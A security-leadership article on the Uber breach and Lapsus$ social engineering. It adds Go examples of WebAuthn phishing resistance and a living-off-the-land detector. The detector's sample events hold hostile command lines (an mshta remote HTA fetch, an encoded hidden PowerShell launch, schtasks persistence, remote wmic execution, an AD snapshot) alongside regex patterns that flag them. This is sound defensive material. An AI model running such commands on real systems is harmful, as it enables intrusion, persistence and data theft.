On September 15, the New York Times reported that Uber suffered a breach. Uber acknowledged a cybersecurity incident that same day and provided a detailed update on September 19, stating that a contractor's account was compromised, and "it is likely that the attacker purchased the contractor's Uber corporate password on the dark web."
The adversary socially engineered the contractor into approving a two-factor authentication (2FA) push request, which gave the attacker initial access. From there the attacker elevated privileges and reached a wide array of Uber's applications and environments, including AWS, Google Workspace, HackerOne, OpenDNS, SentinelOne, and Slack. Uber attributed the intrusion to Lapsus$, the threat group that initially extorted organizations in South America before targeting global companies such as Microsoft, NVIDIA, Samsung, and T-Mobile.
What lessons can security leaders take away from this developing incident? Before I get into what security teams should do, let's talk about what they shouldn't do.
First, don't victim blame: employees and contractors who fall prey to social engineering are simply trying to do their jobs. They aren't cybersecurity experts who know the latest threat actor tactics, techniques, and procedures (TTPs). Set colleagues and peers up for success with the processes and technology that let them make the right security decisions.
Second, don't have a false sense of security around multi-factor authentication (MFA). SMS-based codes fall to SIM swapping, where the threat actor convinces the mobile carrier to move the victim's phone number onto a SIM the attacker controls. Push-based MFA fails when a user worn down by repeated prompts taps "approve," which is what happened here. Adversary-in-the-middle (AiTM) phishing bypasses MFA as well: the phishing site proxies the real login page, the victim completes the MFA step against the real service, and the attacker captures the resulting session cookie, which is then valid without any further MFA. Microsoft released a report detailing an AiTM campaign that targeted more than 10,000 organizations. Simply put, traditional approaches to MFA aren't enough.
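The reason FIDO U2F and FIDO2 credentials resist the AiTM and relay attacks above is worth seeing in code, since it also underpins the first recommendation below. The following Go program is an added example of my own, not code from the article, from Uber, or from any FIDO library. It models the WebAuthn "get assertion" ceremony with two simplifications that are assumptions of this example: the rpId is taken to equal the origin's host (real browsers also allow a registrable parent domain), and the authenticator data carries only the rpId hash, one flag byte and a counter. The hostnames and the `Authenticator`, `GetAssertion` and `VerifyAssertion` names are hypothetical.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/json"
	"errors"
	"fmt"
	"net/url"
)

// Added example, not from the article or any FIDO library: a stripped-down model
// of the WebAuthn "get assertion" ceremony showing why an AiTM proxy cannot reuse it.

type clientData struct {
	Challenge string `json:"challenge"`
	Origin    string `json:"origin"` // filled in by the browser, never by the page
}

type Assertion struct {
	AuthData   []byte // SHA-256(rpId) || flags || counter (simplified layout)
	ClientData []byte // clientDataJSON exactly as signed
	Signature  []byte // ECDSA P-256 over SHA-256(AuthData || SHA-256(ClientData))
}

// Authenticator holds one credential, scoped at registration to a single rpId.
type Authenticator struct {
	rpID string
	priv *ecdsa.PrivateKey
}

func NewAuthenticator(rpID string) (*Authenticator, error) {
	priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	return &Authenticator{rpID: rpID, priv: priv}, err
}

func (a *Authenticator) PublicKey() *ecdsa.PublicKey { return &a.priv.PublicKey }

func signingInput(authData, clientDataJSON []byte) []byte {
	cdHash := sha256.Sum256(clientDataJSON)
	h := sha256.Sum256(append(append([]byte{}, authData...), cdHash[:]...))
	return h[:]
}

// GetAssertion models browser plus authenticator: the browser derives rpId from the
// host the user is really on, and the authenticator only answers for its own rpId.
func (a *Authenticator) GetAssertion(browserOrigin, challenge string) (*Assertion, error) {
	u, err := url.Parse(browserOrigin)
	if err != nil {
		return nil, err
	}
	rpID := u.Hostname()
	if rpID != a.rpID {
		return nil, fmt.Errorf("no credential for rpId %q (registered for %q)", rpID, a.rpID)
	}
	cd, _ := json.Marshal(clientData{Challenge: challenge, Origin: browserOrigin}) // cannot fail for this struct
	rpHash := sha256.Sum256([]byte(rpID))
	authData := append(rpHash[:], 0x01, 0, 0, 0, 1) // flags: user present; counter = 1
	sig, err := ecdsa.SignASN1(rand.Reader, a.priv, signingInput(authData, cd))
	if err != nil {
		return nil, err
	}
	return &Assertion{AuthData: authData, ClientData: cd, Signature: sig}, nil
}

// VerifyAssertion is the relying-party side. The challenge check makes each
// assertion single-use, so a captured one is worthless, unlike a captured cookie.
func VerifyAssertion(pub *ecdsa.PublicKey, expectedOrigin, expectedRPID, challenge string, as *Assertion) error {
	var cd clientData
	if err := json.Unmarshal(as.ClientData, &cd); err != nil {
		return err
	}
	if cd.Challenge != challenge {
		return errors.New("challenge mismatch (replayed assertion?)")
	}
	if cd.Origin != expectedOrigin {
		return fmt.Errorf("origin mismatch: %q", cd.Origin)
	}
	want := sha256.Sum256([]byte(expectedRPID))
	if len(as.AuthData) < 32 || string(as.AuthData[:32]) != string(want[:]) {
		return errors.New("rpIdHash mismatch")
	}
	if !ecdsa.VerifyASN1(pub, signingInput(as.AuthData, as.ClientData), as.Signature) {
		return errors.New("bad signature")
	}
	return nil
}

func main() {
	const rpID, origin = "sso.corp.example", "https://sso.corp.example"
	auth, _ := NewAuthenticator(rpID)
	as, _ := auth.GetAssertion(origin, "nonce-1")
	fmt.Println("real site:", VerifyAssertion(auth.PublicKey(), origin, rpID, "nonce-1", as))
	_, err := auth.GetAssertion("https://sso-corp-example.net", "nonce-1") // AiTM proxy relaying the real challenge
	fmt.Println("phishing proxy:", err)
	fmt.Println("replayed assertion:", VerifyAssertion(auth.PublicKey(), origin, rpID, "nonce-2", as))
}
```

The two failure paths are the ones that matter for this article. The proxy at the look-alike host relays the genuine challenge, but the browser scopes the request to the proxy's own host, so the authenticator has nothing to sign with; no amount of social engineering changes that, because the user never supplies the origin. And an assertion the attacker does manage to capture is bound to one server challenge, so replaying it against a new login fails, which is exactly the property a stolen session cookie lacks.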
So how should security leaders respond to the Uber breach? Here are my five recommendations:
- Traditional MFA doesn't hold up against these attacks, so put the company on a FIDO U2F or a passwordless FIDO2 journey. The second factor becomes something the person has: a hardware token like a YubiKey, or a phone's authenticator used over NFC. Because the credential is bound to the site's origin and the signature covers a fresh server challenge, there is no code to relay and no push prompt to wear a user down, which defeats SIM swapping and AiTM attacks. Expect user-experience tradeoffs with physical devices, so start with employees who hold administrative access. Whichever approach the company selects, start small, validate, and expand.
- Conduct a tabletop exercise with Lapsus$ as the opposing force. Several vendors have documented the Lapsus$ TTPs. How well does the company stand up to their social engineering techniques? Can the team detect their lateral movement? Tabletops don't cost the company anything but time. CISA offers tabletop exercise packages that security teams can adopt for their organizations.
- Conduct a living-off-the-land risk assessment. We know adversaries leverage legitimate tools. Can the security team detect misuse? AD Explorer, Microsoft HTML Applications (HTA), PowerShell, Scheduled Tasks, and Windows Management Instrumentation (WMI) are a few Windows tools that adversaries leverage to live off the land. Also, assess the company's endpoint management solutions like JAMF, ManageEngine, SolarWinds, and EDR tools. Harden them and ensure the team has logging in place, including process command-line auditing: a record that powershell.exe started says little without its arguments. Remember, "logs, or it didn't happen."
- Review the hardening guidelines for the company’s MFA tools. Does the organization follow the provider's best practices? Reach out to the Customer Success team for recommendations. Consider a professional services engagement to assess and improve the organization’s implementation. A health check costs far less than the costs associated with an intrusion.
- Make sure security has a strong position in 2023 budget planning. Take this opportunity to include recommendations from the tabletop exercise and risk assessments for next year’s budget proposal. Take full advantage of existing detective and preventive controls before investing in a new solution; don't take an "expense-in-depth" approach. Also, include the people aspect in the planning. Does the company need to level-up and train administrators so they can properly configure the solutions they manage? Does the company need to level-up its threat hunting teams so they can quickly identify malicious activity?
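To make the living-off-the-land assessment in the third recommendation concrete, here is an added example of my own, not code from the article or from any vendor: a small Go rule set run over constructed process-creation events, the kind of check a hunt team can run against its own SIEM export to confirm that abuse of the tools named above is visible at all. The hostnames, users and command lines are made up, the field layout assumes a SIEM has normalised Windows Security 4688 events with command-line auditing on (or Sysmon event 1), and the rule names and patterns are this example's assumptions about a first pass, not a complete detection set.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Added example, not from the original article. ProcEvent is one normalised
// process-creation record; the sample data below is constructed.
type ProcEvent struct {
	Host, User, Parent, Image, CmdLine string
}

type Rule struct {
	Name    string
	Images  []string       // lower-case image basenames the rule applies to
	CmdLine *regexp.Regexp // pattern the command line must match
}

type Alert struct {
	Host, User, Rule, CmdLine string
}

// Rules for the tools the article names. Each keys on an abuse pattern rather
// than the binary itself, because administrators run the same binaries daily.
var rules = []Rule{
	{"mshta: remote or inline script", []string{"mshta.exe"},
		regexp.MustCompile(`(?i)(https?://|javascript:|vbscript:)`)},
	{"powershell: encoded command", []string{"powershell.exe", "pwsh.exe"},
		regexp.MustCompile(`(?i)\s-(e|ec|en|enc|encodedcommand)\s`)},
	{"powershell: hidden window", []string{"powershell.exe", "pwsh.exe"},
		regexp.MustCompile(`(?i)\s-w(indowstyle)?\s+hidden\b`)},
	{"schtasks: task creation", []string{"schtasks.exe"},
		regexp.MustCompile(`(?i)/create\b`)},
	{"wmic: process creation (often remote)", []string{"wmic.exe"},
		regexp.MustCompile(`(?i)process\s+call\s+create`)},
	{"adexplorer: AD snapshot to disk", []string{"adexplorer.exe", "adexplorer64.exe"},
		regexp.MustCompile(`(?i)-snapshot`)},
}

// basename lowercases the image name and strips a Windows or POSIX path.
func basename(p string) string {
	if i := strings.LastIndexAny(p, `\/`); i >= 0 {
		p = p[i+1:]
	}
	return strings.ToLower(p)
}

// Detect applies every rule to every event and returns one Alert per match.
func Detect(events []ProcEvent) []Alert {
	var alerts []Alert
	for _, ev := range events {
		img := basename(ev.Image)
		for _, r := range rules {
			applies := false
			for _, want := range r.Images {
				if img == want {
					applies = true
					break
				}
			}
			if applies && r.CmdLine.MatchString(ev.CmdLine) {
				alerts = append(alerts, Alert{ev.Host, ev.User, r.Name, ev.CmdLine})
			}
		}
	}
	return alerts
}

// Constructed sample: one workstation showing an HTA to PowerShell chain with
// persistence, remote execution and AD collection, plus benign admin use of
// the same binaries on another host that must stay quiet.
var sampleEvents = []ProcEvent{
	{"WS-0412", `CORP\j.doe`, "explorer.exe", `C:\Windows\System32\mshta.exe`,
		`mshta.exe https://cdn.example.net/update.hta`},
	{"WS-0412", `CORP\j.doe`, "mshta.exe", `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`,
		`powershell.exe -nop -w hidden -enc SQBFAFgAIAAoACIAdwBoAG8AYQBtAGkAIgApAA==`},
	{"WS-0412", `CORP\j.doe`, "powershell.exe", `C:\Windows\System32\schtasks.exe`,
		`schtasks.exe /create /sc onlogon /tn Updater /tr "powershell -w hidden -f C:\Users\Public\u.ps1"`},
	{"WS-0412", `CORP\j.doe`, "cmd.exe", `C:\Windows\System32\wbem\WMIC.exe`,
		`wmic /node:FS01 process call create "cmd.exe /c whoami > C:\Windows\Temp\o.txt"`},
	{"WS-0412", `CORP\j.doe`, "cmd.exe", `C:\Tools\ADExplorer.exe`,
		`ADExplorer.exe -snapshot "" C:\Users\Public\ad.dat`},
	{"ADM-01", `CORP\svc-patch`, "cmd.exe", `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`,
		`powershell.exe -File C:\Ops\patch-report.ps1`},
	{"ADM-01", `CORP\svc-patch`, "cmd.exe", `C:\Windows\System32\schtasks.exe`,
		`schtasks.exe /query /tn PatchReport`},
}

func main() {
	for _, a := range Detect(sampleEvents) {
		fmt.Printf("%s %s [%s] %s\n", a.Host, a.User, a.Rule, a.CmdLine)
	}
}
```

Run against the sample, the five events on WS-0412 raise six alerts (the PowerShell stage trips both the encoded-command and hidden-window rules) and the two administrative events on ADM-01 raise none. The useful part of the exercise is not the rules but what happens when you point them at real data: if the command-line field is empty, the process-creation policy is not capturing it and none of these patterns can fire, which is the "logs, or it didn't happen" gap the assessment is meant to find.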
Uber's environment is typical of a global company, and many companies are vulnerable to similar attacks. Take the lessons from this event and add more resilience to the organization's security program.
Rick Holland, chief information security officer, vice president of strategy, Digital Shadows